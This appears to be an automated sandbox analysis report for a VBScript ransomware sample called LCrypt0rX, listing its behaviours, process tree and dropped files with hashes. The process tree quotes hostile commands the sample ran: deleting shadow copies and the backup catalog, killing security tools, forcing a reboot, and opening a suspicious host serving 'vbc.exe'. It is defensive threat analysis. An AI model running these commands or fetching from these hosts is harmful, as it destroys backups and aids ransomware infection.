Analysis

  • max time kernel
    22s
  • max time network
    23s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-11-2024 07:08

Errors

Reason
Machine shutdown

General

  • Target

    Ransom.Win32.LCrypt0rX.A/LCrypt0rX with shutdown.vbs

  • Size

    22KB

  • MD5

    daff797005d106285f0c108163c12112

  • SHA1

    eab3a12828fb714fb0bec51370f9e96fbc6acca9

  • SHA256

    0238c46480d90db10c2be7f3742bf45eb5cf5f6b1e5865c9adc066b6bd9a550e

  • SHA512

    2a0c2ac6e8f81a7d1b3aa7f5652d60de35567d68a85fdc7b66ed0b978c3674c61ed1bb08f5081e2fa6e20659bf2610f348fc00ef45030018814dbd0e0bdc06cd

  • SSDEEP

    384:tpGbplStxYHQHSH7l+ivHVn2jvVQayXwA+sxQ+E6f:shR26Y+Ee

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 3 IoCs
  • Blocks application from running via registry modification 4 IoCs

    Adds application to list of disallowed applications.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables RegEdit via registry modification 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 5 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX with shutdown.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\Ransom.Win32.LCrypt0rX.A\LCrypt0rX with shutdown.vbs" /elevated
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Blocks application from running via registry modification
      • Disables RegEdit via registry modification
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Modifies Control Panel
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1504
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2168
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c wbadmin delete catalog -quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Windows\system32\wbadmin.exe
          wbadmin delete catalog -quiet
          4⤵
          • Deletes backup catalog
          PID:2608
      • C:\Windows\System32\notepad.exe
        "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt
        3⤵
        • Opens file in notepad (likely ransom note)
        PID:1472
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Windows\System32\iamthedoom.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1528
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2888
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2888 CREDAT:275457 /prefetch:2
            5⤵
              PID:216
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1124
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1124 CREDAT:275457 /prefetch:2
              5⤵
                PID:2620
            • C:\Windows\system32\calc.exe
              calc
              4⤵
                PID:1892
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
                4⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1984
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1984 CREDAT:275457 /prefetch:2
                  5⤵
                    PID:2856
                • C:\Program Files\Internet Explorer\iexplore.exe
                  "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
                  4⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:2188
                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2188 CREDAT:275457 /prefetch:2
                    5⤵
                      PID:2720
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
                    4⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of SetWindowsHookEx
                    PID:1556
                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1556 CREDAT:275457 /prefetch:2
                      5⤵
                        PID:1760
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
                      4⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of SetWindowsHookEx
                      PID:308
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:308 CREDAT:275457 /prefetch:2
                        5⤵
                          PID:752
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
                        4⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:2684
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2684 CREDAT:275457 /prefetch:2
                          5⤵
                            PID:2920
                        • C:\Windows\system32\calc.exe
                          calc
                          4⤵
                            PID:1996
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
                            4⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:2444
                            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2444 CREDAT:275457 /prefetch:2
                              5⤵
                                PID:2648
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
                              4⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of SetWindowsHookEx
                              PID:1508
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1508 CREDAT:275457 /prefetch:2
                                5⤵
                                  PID:2772
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
                                4⤵
                                  PID:1800
                                • C:\Program Files\Internet Explorer\iexplore.exe
                                  "C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js
                                  4⤵
                                    PID:2956
                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                    "C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla
                                    4⤵
                                      PID:2288
                                    • C:\Windows\system32\calc.exe
                                      calc
                                      4⤵
                                        PID:2480
                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/
                                        4⤵
                                          PID:2892
                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                          "C:\Program Files\Internet Explorer\iexplore.exe" http://smoggy-inexpensive-innocent.glitch.me/
                                          4⤵
                                            PID:1772
                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                            "C:\Program Files\Internet Explorer\iexplore.exe" http://mail.yahoo.com/
                                            4⤵
                                              PID:1980
                                          • C:\Windows\System32\wscript.exe
                                            "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
                                            3⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:1652
                                            • C:\Windows\System32\wscript.exe
                                              "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:2864
                                              • C:\Windows\System32\wscript.exe
                                                "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
                                                5⤵
                                                  PID:1656
                                                  • C:\Windows\System32\wscript.exe
                                                    "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
                                                    6⤵
                                                      PID:1412
                                              • C:\Windows\System32\wscript.exe
                                                "C:\Windows\System32\wscript.exe" C:\Windows\System32\wins32bugfix.vbs
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1792
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM powershell.exe /F
                                                  4⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2868
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM taskmgr.exe /F
                                                  4⤵
                                                  • Kills process with taskkill
                                                  PID:1720
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM cmd.exe /F
                                                  4⤵
                                                  • Kills process with taskkill
                                                  PID:2700
                                                • C:\Windows\System32\taskkill.exe
                                                  "C:\Windows\System32\taskkill.exe" /IM regedit.exe /F
                                                  4⤵
                                                  • Kills process with taskkill
                                                  PID:920
                                              • C:\Windows\System32\shutdown.exe
                                                "C:\Windows\System32\shutdown.exe" /r /t 0
                                                3⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2124
                                              • C:\Windows\System32\taskkill.exe
                                                "C:\Windows\System32\taskkill.exe" /F /IM explorer.exe
                                                3⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1072
                                          • C:\Windows\system32\vssvc.exe
                                            C:\Windows\system32\vssvc.exe
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:264
                                          • C:\Windows\system32\wbengine.exe
                                            "C:\Windows\system32\wbengine.exe"
                                            1⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2584
                                          • C:\Windows\System32\vdsldr.exe
                                            C:\Windows\System32\vdsldr.exe -Embedding
                                            1⤵
                                              PID:2652
                                            • C:\Windows\System32\vds.exe
                                              C:\Windows\System32\vds.exe
                                              1⤵
                                                PID:2632
                                              • C:\Windows\system32\LogonUI.exe
                                                "LogonUI.exe" /flags:0x0
                                                1⤵
                                                  PID:2036
                                                • C:\Windows\system32\LogonUI.exe
                                                  "LogonUI.exe" /flags:0x1
                                                  1⤵
                                                    PID:1816

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{397E5211-9820-11EF-9107-E62D5E492327}.dat

                                                    Filesize

                                                    5KB

                                                    MD5

                                                    66814fa5e3cf975cc89514d460d2f382

                                                    SHA1

                                                    6be1952df229b5848e30b1e6c31758f0efc93203

                                                    SHA256

                                                    3492e89b7d6257e27614078c50d9aa22d8c159fb2bd718189899693237ed31dd

                                                    SHA512

                                                    5b4a250f9c66377ae485d4e2433b3b62144385663a460e3d5f98cc2c76987fe349198a16c5f579e73488ecb4a0bafaf46c18ec7ba414c9e5f8abd7a5301d6d6f

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3983F761-9820-11EF-9107-E62D5E492327}.dat

                                                    Filesize

                                                    4KB

                                                    MD5

                                                    d6c0cd87bfd1a06261a18051f3dc08d3

                                                    SHA1

                                                    8b495be0a0df6fb91b506d627e7fec96019fc27f

                                                    SHA256

                                                    65ec5a9aaf8f5f9a32f28fbffbd6bbda116a5a601e1ec8ec6b2499bf43620dae

                                                    SHA512

                                                    343191b0991cae2ea6e6831ab0dc22697341a989b9bfde99ffac72efb1ad234e3751ccee77a36efa0700e2fe3804f4a0c545f1308403b74e4f0b7a77ac6c097a

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3983F761-9820-11EF-9107-E62D5E492327}.dat

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    442b43b4daa26847f5581348140d3872

                                                    SHA1

                                                    0a0e44a5d993ba07bf7fdeec27b7c8a2d1c2e00e

                                                    SHA256

                                                    c6ec799a1c336cd9013004001826a38c6c03f2250d5f166238f77be43f3559af

                                                    SHA512

                                                    6a3796384247d680dac6d786172bc30302674f316e3725217e9c5302ef311e81e29755e85b2e01dc9f148c555f6ecdf617fc188f0c01ab192525f1c113683ab2

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{398A8711-9820-11EF-9107-E62D5E492327}.dat

                                                    Filesize

                                                    5KB

                                                    MD5

                                                    f2fda2be9d62e08ebc44d4200e0cab28

                                                    SHA1

                                                    33211d88d855c4554fad8003b16d92f640c8e7cf

                                                    SHA256

                                                    70155d9da7c29ec32436b510c2ee92e232dcdcf9944886c2feff075b2edff93c

                                                    SHA512

                                                    84f90e8ada7d3d677301e2109153d1190724dfae764a8f3725ea41162b77abb55c88cf4ce73e0796a37902aa806d8d1bc2641c418606bebc863e3579313a44ac

                                                  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{39A0BE91-9820-11EF-9107-E62D5E492327}.dat

                                                    Filesize

                                                    4KB

                                                    MD5

                                                    01c3d982e829f3043a01019ee355c329

                                                    SHA1

                                                    c93c5f6351beeeca9f9eb4b866e625db00c04ec3

                                                    SHA256

                                                    5812c76fdd54e62c0e33a3b02886b8e30644d2a1069dd33f159ebaad985f534c

                                                    SHA512

                                                    31bb3868b821fb9a7d5f3c23185235ae0e84fa0925f8a93f78781bc5534f32c062850a00588de731e0ffaee173070178b981f552ba8e37815450523b0884d214

                                                  • C:\Users\Admin\AppData\Local\Temp\CabCADF.tmp

                                                    Filesize

                                                    70KB

                                                    MD5

                                                    49aebf8cbd62d92ac215b2923fb1b9f5

                                                    SHA1

                                                    1723be06719828dda65ad804298d0431f6aff976

                                                    SHA256

                                                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                    SHA512

                                                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                  • C:\Users\Admin\AppData\Local\Temp\TarCB02.tmp

                                                    Filesize

                                                    181KB

                                                    MD5

                                                    4ea6026cf93ec6338144661bf1202cd1

                                                    SHA1

                                                    a1dec9044f750ad887935a01430bf49322fbdcb7

                                                    SHA256

                                                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                    SHA512

                                                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                  • C:\Users\Admin\Desktop\READMEPLEASE.txt

                                                    Filesize

                                                    263B

                                                    MD5

                                                    3ef0278e79a3b141585b0eb66d965dcd

                                                    SHA1

                                                    2c5a34b067b368adcb8daad4b6ead6c4a1a2ef26

                                                    SHA256

                                                    defe7e5a9ae1aa925ca79cc6f7b1c56368bcf21b48668e1161449ed96bb6774a

                                                    SHA512

                                                    b21fcb3dfc37680fe6669818505101fff46a0848a5406e5e94c5dbe4c6031bb47cfe4763d21fa8d966c8e09e8e5050c4e35bc1f0cfdedcb6cb63bec9db34221c

                                                  • C:\Windows\System32\haha.vbs

                                                    Filesize

                                                    1KB

                                                    MD5

                                                    f2a256e463d8b95880579574a96ed06e

                                                    SHA1

                                                    0148ad8f4a38a303fc58ff7bf543b9fd2da6cdad

                                                    SHA256

                                                    d8c9882db9ff81f39e227378a1476d27075b8aa63e3c7ac31ab79b35a1f63915

                                                    SHA512

                                                    3ac57af6f83ad83d63689c1f9868829cf83220d98b278da267ba4c8398fa541afff38416e1a947aff74963099fdf75c275cb302f3cea120eddd5afc6b9a8b5a1

                                                  • C:\Windows\System32\iamthedoom.bat

                                                    Filesize

                                                    412B

                                                    MD5

                                                    e953d5386439260f927d0bcb1ed36b58

                                                    SHA1

                                                    a8c6f22d68309602cb1421fa07c152e16e0e64f7

                                                    SHA256

                                                    0d61eb415e84f8d6533558991ff07667ef685c4623de163482122a14612caaf8

                                                    SHA512

                                                    a39545ccadba90484004ee824e2e77d6abec16e37220e1e5f22e60a6069c56bc7d032cb91fab01816a44693202587e249d59419b410daa2ec1bdb229997df641

                                                  • C:\Windows\System32\wins32bugfix.vbs

                                                    Filesize

                                                    496B

                                                    MD5

                                                    e2d836beba8f0d92022fc8c07d42f684

                                                    SHA1

                                                    ca8904c7281ff138afbbb2690862a54ebdbd53e7

                                                    SHA256

                                                    2581cbeb3f35d83a6f90ed208a1f3ac8e59efbbeafbaab11c9d2b66c2333e1a3

                                                    SHA512

                                                    ead612bde359a4d0d7b305f8aeaee4d46595c8cbfbfecd0ff76c7dbc1b0156e2a6d5df76787c2c07134df1d4d0122f2b61a51b3287c026ec1e202228f0248ad7

                                                  • memory/1528-2420-0x0000000002970000-0x0000000002A70000-memory.dmp

                                                    Filesize

                                                    1024KB

                                                  • memory/1528-2412-0x0000000002970000-0x0000000002A70000-memory.dmp

                                                    Filesize

                                                    1024KB